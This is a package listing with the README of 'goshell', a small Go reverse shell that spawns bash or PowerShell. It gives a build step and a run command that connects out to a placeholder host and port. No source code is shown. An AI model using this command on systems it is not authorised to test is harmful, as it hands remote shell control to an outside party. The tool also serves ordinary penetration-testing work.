Categorygithub.com/FireFart/goshell
repositorypackage
0.0.0-20200122071546-7b8ee5d9a6a9
Repository: https://github.com/firefart/goshell.git
Documentation: pkg.go.dev

# README

GOSHELL

Simple golang based reverse shell. This calls /bin/bash on linux and powershell.exe on windows

Build

make

Run

./goshell-xxx-xx -host IP -port PORT

Notes

This will not provide encryption or any other securiy measures - this is just a simple reverse shell. If you need something more advanced take a look at Chisel